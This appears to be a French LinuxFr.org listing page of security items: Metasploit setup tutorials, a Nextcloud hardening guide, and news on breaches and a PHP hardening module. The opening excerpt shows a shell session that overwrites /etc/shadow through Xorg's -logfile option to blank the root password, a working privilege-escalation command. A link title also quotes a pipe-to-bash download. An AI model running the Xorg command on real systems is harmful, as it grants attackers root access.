Lien Mise en demeure de l'association 42

Journal La faille grosse comme une maison

[Dev@localhost ~]$ id
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow----------. 1 root root 1241 Oct 10 01:15 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadowcat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)
Wiki [Tuto/HowTo] [Debian/Ubuntu] installer metasploit-framework depuis github
"Un grand pouvoir implique de grandes responsabilités." oncle Ben.
Introduction
Ce tutoriel ne se concentre que sur l'installation de metasploit-framework depuis github.
Ce tuto n'explique PAS comment utiliser metasploit.
Installation
Installez les pré-requis.
sudo apt update
sudo apt-get install -y ruby-dev libpq-dev libpcap-dev libsqlite3-dev postgresql git ruby-bundler build-essential patch ruby-dev zlib1g-dev liblzma-dev libgmp-dev
Créez le dossier pour accueillir les fichiers.
sudo mkdir /opt/metasploit
Accordez les bonnes permissions au dossier.
sudo chown $USER:root -R /opt/metasploit
sudo
(…)
Wiki [Tuto/HowTo] [Debian/Ubuntu] Interfacer metasploit avec la base de données PostGreSQL
musique d'ambiance : Best Melodic Dubstep Mix 2016
"Un grand pouvoir implique de grandes responsabilités." oncle Ben.
Introduction
Nous allons voir ici comment utiliser la base de données PostgreSQL avec Metasploit.
Mise en place
Connectez vous à l'utilisateur dédié de postgresql.
sudo -s -u postgres
Créez utilisateur dédié pour metasploit.
createuser -d -P metasploit
- -d => autorise l'utilisateur à créer des base de données (n'est PAS nécessaire)
- -P => on demande à définir un mot de (…)
Lien "wget http://foo.com/command.sh | bash" considered harmful

Forum Linux.debian/ubuntu [WorkFlow] [Ubuntu/Debian] Chiffrer ses partitions avec montage via commande SSH
Lien L'état chinois suspecté d'avoir introduit des puces espionnes dans le design de matériel

Wiki [Tuto/HowTo] Nextcloud - restreindre accès à la page status.php
Introduction
La page status.php sert aux applications nextcloud clientes de vérifier le status en ligne du serveur.
Cette page peut aussi être utilisé afin de forger des Google Dork permettant de trouver des installations de nextcloud potentiellement plus fragile face au piratage.
Topic sur le forum de la communauté nextcloud : https://help.nextcloud.com/t/how-to-censor-status-php-page/38040
Il est fortement déconseillé de bloquer l'accès à cette page au risque de casser les clients de Nextcloud.
Via HaProxy
Ajoutez les lignes suivantes dans voter Backend (conseillé) (…)
Lien CLIP OS : un système d'exploitation durci par l'ANSSI
Lien Foreshadow-NG : Va encore falloir patcher vos Intel
Lien Elon Musk veut libérer le source du système de sécurité de ses véhicules «for free use by [others]»

Journal Reddit a subi une attaque informatique

Rien de grande ampleur cela dit, qu’on se rassure, ce super site web de partage de liens qu’est Reddit est toujours en vie !
C’était il y a deux semaines environ. L’attaque a consisté en l’interception de SMS. Reddit recommande donc de passer à l’authentification 2FA qui utilise un jeton (à la place du SMS).
Toutes les données de 2007 et antérieures ont fuitées, mais les mots de passe sont hashés et salés (ce qui veut dire si je (…)
Journal Freenaute, ton mot de passe d'abonné est stocké en clair chez Free

Bienvenue en 2018,
Année de la mise en application du RGPD.
Année de la maturité en cybersécurité ? Pas pour tout le monde en tous cas.
Mon expérience d'hier soir m'a laissé perplexe. Sur la page de connexion des abonnés Freebox, ayant perdu mon mot de passe, j'ai renseigné les champs me permettant de le récupérer et … surprise, je l'ai récupéré … en clair par mail.
Nous sommes en 2018 et Free stocke les mots de passe de ses (…)
Snuffleupagus version 0.3.0 Dentalium elephantinum
Snuffleupagus est un module pour PHP (version 7.0 et supérieures) qui a pour but d’augmenter drastiquement la difficulté des attaques contre les sites Web. Cela s’obtient, entre autres, via la désactivation de fonctions et de classes, et en fournissant un système de correctifs virtuels, permettant à l’administrateur de corriger des vulnérabilités spécifiques sans modifier le code PHP.
La version 0.3.0, disponible depuis le 18 juillet 2018, est un excellent prétexte pour parler de ce projet sur LinuxFr.org, avec des détails juteux en deuxième partie de dépêche.